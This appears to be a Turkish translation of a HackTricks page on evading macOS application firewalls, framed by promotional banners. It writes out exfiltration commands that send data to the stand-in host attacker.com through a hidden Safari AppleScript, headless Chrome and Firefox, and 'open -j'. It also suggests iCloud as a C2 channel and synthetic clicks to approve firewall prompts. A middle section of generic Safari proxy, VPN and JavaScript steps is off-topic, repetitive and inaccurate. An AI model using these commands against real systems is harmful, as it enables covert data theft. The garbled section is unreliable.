8 KiB
macOS Firewall Bypass Etme
AWS hacklemeyi sıfırdan kahraman olmaya öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Bulunan teknikler
Aşağıdaki teknikler, bazı macOS güvenlik duvarı uygulamalarında çalıştığı tespit edilen tekniklerdir.
Beyaz liste isimlerini kötüye kullanma
- Örneğin, kötü amaçlı yazılımı
launchdgibi iyi bilinen macOS işlemleri adlarıyla çağırma
Sentetik Tıklama
- Güvenlik duvarı kullanıcıdan izin istiyorsa, kötü amaçlı yazılımın izin ver'e tıklamasını sağlama
Apple imzalı ikili dosyaları kullanma
curlgibi, aynı zamandawhoisgibi diğerleri de
İyi bilinen apple alan adları
Güvenlik duvarı, apple.com veya icloud.com gibi iyi bilinen apple alan adlarına bağlantılara izin verebilir. Ve iCloud bir C2 olarak kullanılabilir.
Genel Bypass
Güvenlik duvarını atlamak için denenebilecek bazı fikirler
İzin verilen trafiği kontrol etme
İzin verilen trafiği bilmek, potansiyel olarak beyaz listeye alınmış alan adlarını veya bunlara erişime izin verilen uygulamaları belirlemenize yardımcı olacaktır.
lsof -i TCP -sTCP:ESTABLISHED
DNS Kötüye Kullanma
DNS çözümlemeleri, muhtemelen DNS sunucularına erişime izin verilecek olan mdnsreponder adlı uygulama aracılığıyla yapılır.
Tarayıcı Uygulamaları Aracılığıyla
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
Safari
Safari, Apple'ın varsayılan web tarayıcısıdır. macOS üzerinde çalışır ve güvenlik önlemleriyle donatılmıştır. Ancak, bazı durumlarda güvenlik duvarını atlamak için bazı teknikler kullanılabilir.
1. Proxy Sunucusu Kullanma
Proxy sunucusu kullanarak, internet trafiğinizi başka bir sunucu üzerinden yönlendirebilir ve güvenlik duvarını atlayabilirsiniz. Bu, IP adresinizi gizlemek ve engellenmiş web sitelerine erişmek için etkili bir yöntemdir.
Proxy sunucusu ayarlarını Safari'de yapılandırmak için aşağıdaki adımları izleyin:
- Safari'yi açın ve "Tercihler"i seçin.
- "Gelişmiş" sekmesine gidin ve "Değiştir" düğmesine tıklayın.
- "Proxies" sekmesine gidin ve "Web Proxy (HTTP)" seçeneğini işaretleyin.
- Proxy sunucusunun IP adresini ve port numarasını girin.
- "Tamam" düğmesine tıklayın ve ayarları kaydedin.
2. VPN Kullanma
VPN (Virtual Private Network), internet trafiğinizi şifreleyerek güvenli bir şekilde iletmek için kullanılan bir teknolojidir. VPN kullanarak, güvenlik duvarını atlayabilir ve internet trafiğinizi başka bir konumdan yönlendirebilirsiniz.
Safari'de VPN kullanmak için aşağıdaki adımları izleyin:
- Bir VPN hizmeti sağlayıcısı seçin ve hesap oluşturun.
- macOS üzerinde VPN ayarlarını yapılandırın.
- Safari'yi açın ve "Tercihler"i seçin.
- "Gelişmiş" sekmesine gidin ve "Değiştir" düğmesine tıklayın.
- "Proxies" sekmesine gidin ve "Web Proxy (HTTP)" seçeneğini işaretleyin.
- VPN sağlayıcınızın sunucusunun IP adresini ve port numarasını girin.
- "Tamam" düğmesine tıklayın ve ayarları kaydedin.
3. JavaScript Devre Dışı Bırakma
JavaScript, web sitelerinde etkileşimli öğelerin çalışmasını sağlayan bir programlama dilidir. Ancak, bazı durumlarda güvenlik duvarını atlamak için JavaScript'i devre dışı bırakabilirsiniz.
Safari'de JavaScript'i devre dışı bırakmak için aşağıdaki adımları izleyin:
- Safari'yi açın ve "Tercihler"i seçin.
- "Gelişmiş" sekmesine gidin ve "Değiştir" düğmesine tıklayın.
- "Gelişmiş" sekmesinde "Web sitesi kullanımı" bölümüne gidin.
- "JavaScript'i etkinleştir" seçeneğini kaldırın.
- "Tamam" düğmesine tıklayın ve ayarları kaydedin.
Bu yöntem, bazı web sitelerinin düzgün çalışmamasına neden olabilir, bu nedenle dikkatli olun.
4. Güvenlik Duvarı Ayarlarını Değiştirme
Safari'de güvenlik duvarı ayarlarını değiştirerek, engellenmiş web sitelerine erişebilirsiniz. Ancak, bu yöntem, güvenlik açıklarına neden olabilir ve bilgisayarınızı risk altına sokabilir.
Güvenlik duvarı ayarlarını değiştirmek için aşağıdaki adımları izleyin:
- Safari'yi açın ve "Tercihler"i seçin.
- "Gelişmiş" sekmesine gidin ve "Değiştir" düğmesine tıklayın.
- "Gelişmiş" sekmesinde "Web sitesi kullanımı" bölümüne gidin.
- "Güvenlik" sekmesine gidin ve "Web sitesi izinleri"ni seçin.
- Engellenmiş web sitelerini bulun ve "İzin Ver" seçeneğini işaretleyin.
- "Tamam" düğmesine tıklayın ve ayarları kaydedin.
Bu yöntem, güvenlik duvarını atlamak için etkili olabilir, ancak dikkatli olun ve yalnızca güvendiğiniz web sitelerine erişin.
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Süreç enjeksiyonu ile
Eğer herhangi bir sunucuya bağlanmasına izin verilen bir sürece kod enjekte edebilirseniz, güvenlik duvarı korumalarını atlayabilirsiniz:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Referanslar
AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Red Team Expert)'ı öğrenin!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini edinin
- Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm'da takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.